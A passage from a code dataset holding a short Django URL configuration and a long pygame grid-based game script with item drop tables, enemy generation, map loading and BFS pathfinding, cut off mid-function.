"attribute"}, {"api_name": "os.path.dirname", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 225, "usage_type": "call"}]} +{"seq_id": "328801250", "text": "from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n url(r'^$', 'plc.views.home', name='home'),\n url(r'^timer$', 'plc.views.timer', name='timer'),\n url(r'^clients/', include('clients.urls', namespace=\"clients\")),\n url(r'^employees/', include('employees.urls', namespace=\"employees\")),\n url(r'^matters/', include('matters.urls', namespace=\"matters\")),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n)\n", "sub_path": "plc/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 566, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 4, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 4, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 15, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 15, "usage_type": "attribute"}, {"api_name": 
"django.contrib.admin", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "114693783", "text": "import pygame\r\nimport sys\r\nimport os\r\nfrom player import Player\r\nfrom enemy import Enemy\r\nfrom item import Item\r\nfrom portal import Portal\r\nfrom graphics import Graphics\r\nfrom pygame.locals import *\r\nimport collections\r\nfrom copy import copy\r\nimport random\r\nimport time\r\n\r\nclock = pygame.time.Clock()\r\n\r\npygame.init() # initiates pygame\r\nFPS = 60\r\n\r\npygame.display.set_caption('Pygame Platform')\r\n\r\nWINDOW_SIZE = (1200, 800)\r\nSCREEN_SIZE = (600, 400)\r\nscreen = pygame.display.set_mode(WINDOW_SIZE, 0, 32) # initiate the window\r\ndisplay = pygame.Surface(SCREEN_SIZE) # used as the surface for rendering, which is scaled\r\ngame_folder = os.path.dirname(__file__)\r\nimg_folder = os.path.join(game_folder, 'images')\r\ngraphics_folder = os.path.join(game_folder, 'Graphics')\r\nmusic_folder = os.path.join(game_folder, 'music')\r\n\r\nmap_level = 1\r\n# Gets the basic game music going (Commented Cause Im listening to music. Uncomment if forgotten)\r\n# pygame.mixer.init()\r\n# pygame.mixer.music.load(os.path.join(music_folder, 'GameMusic_1.mp3'))\r\n# pygame.mixer.music.play(-1, 0.0)\r\n\r\ngraphics = Graphics(graphics_folder, display, FPS)\r\n\r\ndirt_img = pygame.image.load(os.path.join(img_folder, 'dirt.png'))\r\ncastle_img = pygame.image.load(os.path.join(img_folder, 'castleCenter.png'))\r\nportal_img = pygame.image.load(os.path.join(img_folder, 'portal.jpg'))\r\nitem_img = pygame.image.load(os.path.join(img_folder, 'Chest.png')).convert_alpha()\r\nplayer_img = graphics.Player.get_model()\r\nspear_character_img = pygame.image.load(os.path.join(img_folder, 'MainCharacterSpear.png')).convert_alpha()\r\nenemy1_img = graphics.Enemy1.get_model()\r\nenemy2_img = graphics.Enemy2.get_model()\r\n\r\n\r\ndef split(word):\r\n return [char for char in word]\r\n\r\n\r\ndef enemy_values(enemy_type, difficulty): # enemy_type 1-2 & difficulty 1-3\r\n enemy_identifier = \"Enemy\" + str(enemy_type)\r\n enemy_image = enemy1_img if enemy_type == 1 else enemy2_img\r\n enemy_name = \"Enemy_\" + str(random.randint(0, 10000))\r\n enemy_max_health = 10 * difficulty\r\n enemy_defense = 1 * difficulty\r\n enemy_accuracy = difficulty / 2\r\n enemy_agility = -2 + difficulty\r\n enemy_attack = difficulty / 2\r\n enemy_speed = max(1, difficulty - 1)\r\n enemy_is_dead = False\r\n enemy_position = [0, 0]\r\n if enemy_type == 1:\r\n enemy_type = 2\r\n elif enemy_type == 2:\r\n enemy_type = 1\r\n else:\r\n enemy_type = enemy_type\r\n enemy_starting_weapon = enemy_weapon_creator(enemy_type, difficulty, map_level)\r\n enemy_starting_xp = 0\r\n enemy_death_xp = 40 * difficulty\r\n enemy_characteristics = [enemy_identifier, enemy_image, enemy_name, enemy_max_health, enemy_defense, enemy_accuracy,\r\n enemy_agility, enemy_attack, enemy_speed, enemy_is_dead, enemy_position,\r\n enemy_starting_weapon, enemy_starting_xp, enemy_death_xp]\r\n return enemy_characteristics\r\n\r\n\r\ndef enemy_weapon_creator(enemy_type, difficulty, level):\r\n enemy_weapon_name = \"Spear\"\r\n enemy_weapon_item_type = \"WEAPON\"\r\n enemy_weapon_damage = (enemy_type * difficulty * level) + 6\r\n enemy_weapon_defense = 0\r\n enemy_weapon_health = 0\r\n enemy_weapon_speed = 0\r\n enemy_weapon_length = 0\r\n enemy_weapon_hit_chance = min(80 + (2 * enemy_type * difficulty * level), 100)\r\n enemy_weapon_is_on_ground = False\r\n enemy_weapon_image = item_img\r\n enemy_weapon_player_image = spear_character_img\r\n 
enemy_weapon_position = [0, 0]\r\n if enemy_type == 1:\r\n enemy_weapon_magic = None\r\n elif enemy_type == 2:\r\n if difficulty == 1:\r\n enemy_weapon_magic = [\"DAMAGE\", 1]\r\n elif difficulty == 2:\r\n enemy_weapon_magic = [\"DAMAGE\", 2]\r\n elif difficulty == 3:\r\n enemy_weapon_magic = [\"DAMAGE\", 3]\r\n else:\r\n enemy_weapon_magic = [\"DAMAGE\", difficulty * enemy_type]\r\n else:\r\n enemy_weapon_magic = None\r\n enemy_item = Item(enemy_weapon_name, enemy_weapon_item_type, enemy_weapon_damage, enemy_weapon_defense,\r\n enemy_weapon_health, enemy_weapon_speed, enemy_weapon_length, enemy_weapon_hit_chance,\r\n enemy_weapon_is_on_ground, enemy_weapon_image, enemy_weapon_player_image, enemy_weapon_position,\r\n enemy_weapon_magic)\r\n return enemy_item\r\n\r\n\r\ndef map_item_creator(level):\r\n map_1_drop = [19, 38, 57, 76, 95, 96, 97, 100]\r\n # map_2_drop = [12, 12, 12, 12, 12, 14, 14, 12]\r\n map_2_drop = [12, 24, 36, 48, 60, 74, 88, 100]\r\n # map_3_drop = [10, 10, 10, 10, 10, 20, 20, 10]\r\n map_3_drop = [10, 20, 30, 40, 50, 70, 90, 100]\r\n if level == 1:\r\n map_drop = map_1_drop\r\n elif level == 2:\r\n map_drop = map_2_drop\r\n elif level == 3:\r\n map_drop = map_3_drop\r\n else:\r\n map_drop = map_1_drop\r\n\r\n rand_int1 = random.randint(1, 100)\r\n rand_int2 = random.randint(1, 100)\r\n rand_int3 = random.randint(1, 2)\r\n rand_int = rand_int1 if rand_int3 == 1 else rand_int2\r\n if rand_int <= map_drop[0]: # Spear -------------------------------------------------------------------------------\r\n item_name = \"Spear\"\r\n item_item_type = \"WEAPON\"\r\n item_damage = 8*level\r\n item_defense = 0\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = min(100, 90+(2*level))\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = spear_character_img\r\n item_magic = [\"DAMAGE\", level*5]\r\n\r\n elif map_drop[0] < rand_int <= map_drop[1]: # Shield---------------------------------------------------------------\r\n item_name = \"Shield\"\r\n item_item_type = \"SHIELD\"\r\n item_damage = 0\r\n item_defense = 2*level\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = [\"DEFENSE\", level * 2]\r\n\r\n elif map_drop[1] < rand_int <= map_drop[2]: # Helmet---------------------------------------------------------------\r\n item_name = \"Helmet\"\r\n item_item_type = \"HELMET\"\r\n item_damage = 0\r\n item_defense = level\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = None\r\n\r\n elif map_drop[2] < rand_int <= map_drop[3]: # Armor----------------------------------------------------------------\r\n item_name = \"Armor\"\r\n item_item_type = \"ARMOR\"\r\n item_damage = 0\r\n item_defense = 3*level\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = None\r\n\r\n elif map_drop[3] < rand_int <= map_drop[4]: # Boots----------------------------------------------------------------\r\n item_name = \"Boots\"\r\n item_item_type = \"BOOTS\"\r\n item_damage = 0\r\n item_defense = level\r\n item_health = 0\r\n item_speed = level\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = 
None\r\n item_magic = None\r\n\r\n elif map_drop[4] < rand_int <= map_drop[5]: # Potions--------------------------------------------------------------\r\n rand_choice = random.randint(1, 4)\r\n item_name = \"Potion\"\r\n\r\n if rand_choice == 1: # Damage potion\r\n item_item_type = \"DAMAGE_POTION\"\r\n item_damage = 5*level\r\n item_defense = 0\r\n item_health = 0\r\n item_speed = 0\r\n\r\n elif rand_choice == 2: # Defense potion\r\n item_item_type = \"DEFENSE_POTION\"\r\n item_damage = 0\r\n item_defense = 5*level\r\n item_health = 0\r\n item_speed = 0\r\n\r\n elif rand_choice == 3: # Healing potion\r\n item_item_type = \"HEALING_POTION\"\r\n item_damage = 0\r\n item_defense = 0\r\n item_health = 5*level\r\n item_speed = 0\r\n\r\n else: # Speed potion\r\n item_item_type = \"SPEED_POTION\"\r\n item_damage = 0\r\n item_defense = 0\r\n item_health = 0\r\n item_speed = level\r\n\r\n item_length = 10 * level\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = None\r\n\r\n elif map_drop[5] < rand_int <= map_drop[6]: # Trinkets-------------------------------------------------------------\r\n item_name = \"Trinket\"\r\n item_item_type = \"TRINKET\"\r\n item_damage = 0\r\n item_defense = 0\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = [\"DAMAGE\", int(2 * level)]\r\n\r\n elif map_drop[6] < rand_int <= map_drop[7]: # Necklace-------------------------------------------------------------\r\n item_name = \"Necklace\"\r\n item_item_type = \"NECKLACE\"\r\n item_damage = 0\r\n item_defense = 0\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = [\"HEALTH\", 2*level]\r\n\r\n else:\r\n item_name = \"Necklace\"\r\n item_item_type = \"NECKLACE\"\r\n item_damage = 0\r\n item_defense = 0\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = [\"HEALTH\", 2 * level]\r\n print(\"Problem with drop chances\")\r\n\r\n item_position = [0, 0]\r\n item_to_return = Item(item_name, item_item_type, item_damage, item_defense, item_health, item_speed, item_length,\r\n item_hit_chance, item_is_on_ground, item_image, item_player_image, item_position, item_magic)\r\n return item_to_return\r\n\r\n\r\ndef load_new_map(path, level):\r\n f = open(path + str(level) + '.txt', 'r')\r\n data = f.read()\r\n f.close()\r\n\r\n data = data.split('\\n')\r\n\r\n items_set = []\r\n portal_set = []\r\n enemies_set_1 = []\r\n enemies_set_2 = []\r\n\r\n c = 0\r\n item_count = 0\r\n enemy1_count = 0\r\n enemy2_count = 0\r\n portal_count = 0\r\n\r\n f = open(path + '_' + str(level) + '.txt', 'w')\r\n f.seek(0, 0)\r\n for row in data:\r\n r = 0\r\n for k in row:\r\n if str(k) == str(2):\r\n new_item = map_item_creator(map_level)\r\n new_item.set_position([r, c])\r\n items_set.append(new_item)\r\n block = split(row)\r\n block[r] = \"0\"\r\n row = block\r\n row = ''.join(row)\r\n item_count += 1\r\n\r\n if str(k) == \"*\":\r\n portal_new_name = \"Portal \" + str(map_level)\r\n new_portal = Portal(portal_new_name, [r, c], portal_img)\r\n portal_set.append(new_portal)\r\n row = ''.join(row)\r\n portal_count += 1\r\n\r\n if str(k) == str(3):\r\n values = enemy_values(2, 1)\r\n enemy2 = 
Enemy(values[0], values[1], values[2], values[3], values[4], values[5], values[6], values[7],\r\n values[8], values[9], values[10], values[11], values[12], values[13])\r\n enemy2.set_position([r, c])\r\n enemies_set_2.append(enemy2)\r\n block = split(row)\r\n block[r] = \"0\"\r\n row = block\r\n row = ''.join(row)\r\n enemy2_count += 1\r\n\r\n if str(k) == str(4):\r\n values = enemy_values(1, 2)\r\n enemy1 = Enemy(values[0], values[1], values[2], values[3], values[4], values[5], values[6], values[7],\r\n values[8], values[9], values[10], values[11], values[12], values[13])\r\n enemy1.set_position([r, c])\r\n enemies_set_1.append(enemy1)\r\n block = split(row)\r\n block[r] = \"0\"\r\n row = block\r\n row = ''.join(row)\r\n enemy1_count += 1\r\n\r\n else:\r\n pass\r\n r += 1\r\n f.write(str(row) + '\\n')\r\n c += 1\r\n f.close()\r\n return items_set, portal_set, enemies_set_1, enemies_set_2\r\n\r\n# name, item_type, damage, defense, health, speed, length, hit_chance, is_on_ground, image, player_image, position,\r\n# magic):\r\n\r\n\r\n# items = []\r\n# item2 = Item(\"Spear\", \"WEAPON\", 1, 0, 0, 0, 0, 90, True, item_img, spear_character_img, [0, 0], None) # [10, 6]\r\n# item3 = Item(\"Spear\", \"WEAPON\", 1, 0, 0, 0, 0, 90, True, item_img, spear_character_img, [0, 0], None)\r\n# item4 = Item(\"Spear\", \"WEAPON\", 1, 0, 0, 0, 0, 90, True, item_img, spear_character_img, [0, 0], None)\r\n# item5 = Item(\"Spear\", \"WEAPON\", 1, 0, 0, 0, 0, 90, True, item_img, spear_character_img, [0, 0], None)\r\n# item3 = Item(\"Leather Armor\", \"ARMOR\", 0, 5, 0, 0, 0, True, item_img, None, [0, 0], None) # [20, 3]\"Boots\", \"BOOTS\",\r\n# 0, 1, 0, True, item_img, None, [0, 0], None\r\n# item3 = Item(\"Attack Necklace\", \"NECKLACE\", 0, 0, 0, 0, 0, 0, True, item_img, None, [0, 0], [\"DAMAGE\", 2])\r\n# item3 = Item(\"Hth_Potion\", \"HEALING_POTION\", 0, 0, 0, 0, 10, 0, True, item_img, None, [0, 0], [\"HEALTH\", 5])\r\n# item3 = Item(\"Spd_Potion\", \"SPEED_POTION\", 0, 0, 0, 0, 20, 0, True, item_img, None, [0, 0], [\"SPEED\", 1])\r\n# item4 = Item(\"Shield\", \"SHIELD\", 0, 3, 0, 0, 0, 0, True, item_img, None, [0, 0], None) # [15, 6]\r\n# item5 = Item(\"Boots\", \"BOOTS\", 0, 1, 0, 0, 0, 0, True, item_img, None, [0, 0], None) # [20, 6]\r\n# item6 = Item(\"Helmet\", \"HELMET\", 0, 1, 0, 0, 0, 0, True, item_img, None, [0, 0], None) # [15, 6]\r\n# item7 = Item(\"Boots\", \"BOOTS\", 0, 2, 0, 0, 0, 0, True, item_img, None, [0, 0], None) # [20, 6]\r\n\r\n# item1 = Item(\"Spear\", \"WEAPON\", 5, 0, 0, 0, 0, 90, False, item_img, spear_character_img, [0, 0], [\"DAMAGE\", 0])\r\n\r\n#\r\n# items.append(item2)\r\n# items.append(item3)\r\n# items.append(item4)\r\n# items.append(item5)\r\n# items.append(item6)\r\n# items.append(item7)\r\n\r\nplayers = []\r\nplayer1 = Player(\"Player\", player_img, \"Andrew\", 12, 0, -1, 0, -1, 1, False, [6, 6], None, 201, 20)\r\nplayer2 = Player(\"Player\", player_img, \"Yeet\", 100, 0, 1, 0, 1, 2, False, [1, 3], None, 201, 20)\r\nplayers.append(player2)\r\n\r\nitems, portals, enemies1, enemies2 = load_new_map('map', map_level)\r\nobjects = [player2]\r\ncharacters = [player2]\r\n\r\nenemies = []\r\nfor i in items:\r\n objects.append(i)\r\nfor i in portals:\r\n objects.append(i)\r\nfor i in enemies1:\r\n objects.append(i)\r\n characters.append(i)\r\n enemies.append(i)\r\nfor i in enemies2:\r\n objects.append(i)\r\n characters.append(i)\r\n enemies.append(i)\r\n\r\n\r\ntrue_scroll = [0, 0]\r\nspeed = 2\r\ndrop_proc = 10\r\n\r\n\r\ndef get_map_dimensions(path, level):\r\n f = open(path + 
'_' + str(level) + '.txt', 'r')\r\n    data = f.read()\r\n    f.close()\r\n    data = data.split('\\n')\r\n    temp_game_map = []\r\n    for row in data:\r\n        temp_game_map.append(list(row))\r\n    map_dim = [len(temp_game_map[0])-1, len(temp_game_map)-1]\r\n    return map_dim\r\n\r\n\r\ndef load_map(path, level):\r\n    f = open(path + \"_\" + str(level) + '.txt', 'r')\r\n    data = f.read()\r\n    f.close()\r\n    data = data.split('\\n')\r\n    temp_game_map = []\r\n    for row in data:\r\n        temp_game_map.append(list(row))\r\n    return temp_game_map\r\n\r\n\r\ndef get_pixels_from_chunks(chunks):\r\n    return int(16 * chunks)\r\n\r\n\r\ndef get_chunks_from_pixels(pixels):\r\n    return int(pixels / 16)\r\n\r\n\r\ndef collision_test(rect, tiles):\r\n    hit_list = []\r\n    for tile_block in tiles:\r\n        if rect.colliderect(tile_block):\r\n            hit_list.append(tile_block)\r\n    return hit_list\r\n\r\n\r\ndef check_open_square(coordinates):\r\n    x_coord, y_coord = coordinates[0], coordinates[1]\r\n    # Only a \"0\" tile inside the map bounds counts as an open square\r\n    if x_coord <= map_dimensions[0] and y_coord <= map_dimensions[1]:\r\n        return str(game_map[y_coord][x_coord]) == \"0\"\r\n    return False\r\n\r\n\r\ndef find_objects_around(coordinates):\r\n    # Checks the full 8 squares around the player\r\n    list_of_objects = []\r\n    list_of_coords = [[coordinates[0], coordinates[1] + 1], [coordinates[0] + 1, coordinates[1] + 1],\r\n                      [coordinates[0] + 1, coordinates[1]], [coordinates[0] + 1, coordinates[1] - 1],\r\n                      [coordinates[0], coordinates[1] - 1], [coordinates[0] - 1, coordinates[1] - 1],\r\n                      [coordinates[0] - 1, coordinates[1]], [coordinates[0] - 1, coordinates[1] + 1]]\r\n    for object_around in objects:\r\n        for coord in list_of_coords:\r\n            if object_around.get_position() == [coord[0], coord[1]]:\r\n                list_of_objects.append(object_around)\r\n    return list_of_objects\r\n\r\n\r\ndef move(rect, movement, tiles):\r\n    collision_types = {'top': False, 'bottom': False, 'right': False, 'left': False}\r\n    movement[0], movement[1] = get_pixels_from_chunks(movement[0]), get_pixels_from_chunks(movement[1])\r\n    rect.x += movement[0]\r\n    hit_list = collision_test(rect, tiles)\r\n    for tile_block in hit_list:\r\n        if movement[0] > 0:\r\n            rect.right = tile_block.left\r\n            collision_types['right'] = True\r\n        elif movement[0] < 0:\r\n            rect.left = tile_block.right\r\n            collision_types['left'] = True\r\n    rect.y += movement[1]\r\n    hit_list = collision_test(rect, tiles)\r\n    for tile_block in hit_list:\r\n        if movement[1] > 0:\r\n            rect.bottom = tile_block.top\r\n            collision_types['bottom'] = True\r\n        elif movement[1] < 0:\r\n            rect.top = tile_block.bottom\r\n            collision_types['top'] = True\r\n    return rect, collision_types\r\n\r\n\r\ndef find_enemy_in_area(person):\r\n    # returns an enemy of the opposite side\r\n    list_of_objects = find_objects_around(person.get_position())\r\n    if isinstance(person, Player):\r\n        # enemy is enemy\r\n        for object_in_game in list_of_objects:\r\n            if isinstance(object_in_game, Enemy):\r\n                return object_in_game\r\n    if isinstance(person, Enemy):\r\n        # enemy is player\r\n        for object_in_game in list_of_objects:\r\n            if 
isinstance(object_in_game, Player):\r\n return object_in_game\r\n else:\r\n return None\r\n\r\n\r\n# Function to find the shortest path between\r\n# a given source cell to a destination cell.\r\ndef bfs(grid, start_1, end): # takes grid, (x, y), [x,y]\r\n grid = [list(map(str, row)) for row in grid]\r\n width, height = len(grid[0]), len(grid)\r\n wall, clear, player, enemy, item_tile, portal_tile = '1', '0', '2', '3', '4', '*' # These numbers do not specify what enemy\r\n start = (start_1[0], start_1[1])\r\n queue = collections.deque([[start]])\r\n seen = {start}\r\n while queue:\r\n path = queue.popleft()\r\n x_val, y_val = path[-1]\r\n if grid[y_val][x_val] != \"1\" and y_val == end[1] and x_val == end[0]:\r\n return path\r\n\r\n if grid[end[1]][end[0]] == \"0\":\r\n for x2, y2 in ((x_val + 1, y_val), (x_val - 1, y_val), (x_val, y_val + 1), (x_val, y_val - 1)):\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n if grid[end[1]][end[0]] == \"1\":\r\n return -1\r\n\r\n if grid[end[1]][end[0]] == \"2\":\r\n for x2, y2 in ((x_val + 1, y_val), (x_val - 1, y_val), (x_val, y_val + 1), (x_val, y_val - 1)):\r\n if grid[y2][x2] == grid[end[1]][end[0]]:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, enemy, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n else:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n if grid[end[1]][end[0]] == \"3\":\r\n for x2, y2 in ((x_val + 1, y_val), (x_val - 1, y_val), (x_val, y_val + 1), (x_val, y_val - 1)):\r\n if grid[y2][x2] == grid[end[1]][end[0]]:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n else:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n\r\n if grid[end[1]][end[0]] == \"4\":\r\n for x2, y2 in ((x_val + 1, y_val), (x_val - 1, y_val), (x_val, y_val + 1), (x_val, y_val - 1)):\r\n if grid[y2][x2] == grid[end[1]][end[0]]:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n else:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n if grid[end[1]][end[0]] == \"*\":\r\n for x2, y2 in ((x_val + 1, y_val), (x_val - 1, y_val), (x_val, y_val + 1), (x_val, y_val - 1)):\r\n if grid[y2][x2] == grid[end[1]][end[0]]:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, item_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n else:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, 
y2))\r\n\r\n print(\"Invalid location: \" + str(end))\r\n return -1\r\n\r\n\r\ndef find_enemies_by_range(object_in_game):\r\n list_of_all_enemies = []\r\n if isinstance(object_in_game, Player):\r\n for enemy in enemies:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), enemy.get_position())\r\n list_of_all_enemies.append([enemy, len(path_1) - 1])\r\n\r\n if isinstance(object_in_game, Enemy):\r\n for player in players:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), player.get_position())\r\n list_of_all_enemies.append([player, len(path_1) - 1])\r\n\r\n sorted_list = sorted(list_of_all_enemies, key=lambda x_element: x_element[1])\r\n\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[0])\r\n\r\n return newly_sorted_list\r\n\r\n\r\ndef find_enemies_in_range(object_in_game, length):\r\n list_of_all_enemies = []\r\n if isinstance(object_in_game, Player):\r\n for enemy in enemies:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), enemy.get_position())\r\n if len(path_1) <= length:\r\n # print(\"Enemy \" + object.get_name() + \" is \" + str(len(path_1)) + \"blocks away\")\r\n list_of_all_enemies.append([enemy, len(path_1) - 1])\r\n else:\r\n pass\r\n\r\n if isinstance(object_in_game, Enemy):\r\n for player in players:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), player.get_position())\r\n # list_of_all_enemies.append([player, len(path_1) - 1])\r\n # print(\"Player \" + object.get_name() + \" is \" + str(len(path_1)) + \"blocks away\")\r\n if len(path_1) <= length:\r\n list_of_all_enemies.append([player, len(path_1) - 1])\r\n else:\r\n pass\r\n\r\n sorted_list = sorted(list_of_all_enemies, key=lambda x_val: x_val[1])\r\n\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[0])\r\n\r\n return newly_sorted_list\r\n\r\n\r\ndef shortest_dist_to_enemy(object_in_game):\r\n list_of_all_enemies = []\r\n if isinstance(object_in_game, Player):\r\n for enemy in enemies:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), enemy.get_position())\r\n list_of_all_enemies.append([enemy, len(path_1) - 1])\r\n\r\n if isinstance(object_in_game, Enemy):\r\n for player in players:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), player.get_position())\r\n list_of_all_enemies.append([player, len(path_1) - 1])\r\n\r\n sorted_list = sorted(list_of_all_enemies, key=lambda x_val: x_val[1])\r\n if len(sorted_list) != 0:\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[1])\r\n length_away = newly_sorted_list[0] - 1\r\n else:\r\n length_away = float('inf')\r\n return length_away\r\n\r\n\r\ndef shortest_dist_to_item(object_in_game):\r\n list_of_all_items = []\r\n for item_tile in items:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), item_tile.get_position())\r\n list_of_all_items.append([item_tile, len(path_1) - 1])\r\n\r\n sorted_list = sorted(list_of_all_items, key=lambda x_val: x_val[1])\r\n if len(sorted_list) != 0:\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[1])\r\n length_away = newly_sorted_list[0] - 1\r\n else:\r\n length_away = float('inf')\r\n return length_away\r\n\r\n\r\ndef shortest_dist_to_portal(object_in_game):\r\n list_of_all_items = []\r\n for port in portals:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), port.get_position())\r\n list_of_all_items.append([port, len(path_1) - 1])\r\n\r\n sorted_list = 
sorted(list_of_all_items, key=lambda x_val: x_val[1])\r\n if len(sorted_list) != 0:\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[1])\r\n length_away = newly_sorted_list[0] - 1\r\n else:\r\n length_away = float('inf')\r\n return length_away\r\n\r\n\r\ndef find_items_by_range(object_in_game):\r\n list_of_all_items = []\r\n for item_tile in items:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), item_tile.get_position())\r\n list_of_all_items.append([item_tile, len(path_1) - 1])\r\n\r\n sorted_list = sorted(list_of_all_items, key=lambda x_val: x_val[1])\r\n\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[0])\r\n\r\n return newly_sorted_list\r\n\r\n\r\ndef find_items_in_range(object_in_game, length):\r\n list_of_all_items = []\r\n for item_tile in items:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), item_tile.get_position())\r\n if len(path_1) - 1 <= length:\r\n list_of_all_items.append([item_tile, len(path_1) - 1])\r\n else:\r\n pass\r\n sorted_list = sorted(list_of_all_items, key=lambda x_val: x_val[1])\r\n\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[0])\r\n\r\n return newly_sorted_list\r\n\r\n\r\ndef find_item_in_area(person):\r\n # returns an enemy of the opposite side\r\n list_of_objects = find_objects_around(person.get_position())\r\n for object_in_game in list_of_objects:\r\n if isinstance(object_in_game, Item):\r\n return object_in_game\r\n else:\r\n pass\r\n else:\r\n return None\r\n\r\n\r\ndef find_portal_in_range(object_in_game, length):\r\n list_of_all_items = []\r\n for port in portals:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), port.get_position())\r\n if len(path_1) - 1 <= length:\r\n list_of_all_items.append([port, len(path_1) - 1])\r\n else:\r\n pass\r\n sorted_list = sorted(list_of_all_items, key=lambda x_val: x_val[1])\r\n\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[0])\r\n\r\n return newly_sorted_list\r\n\r\n\r\ndef find_portal_in_area(person):\r\n # returns an enemy of the opposite side\r\n list_of_objects = find_objects_around(person.get_position())\r\n for object_in_game in list_of_objects:\r\n if 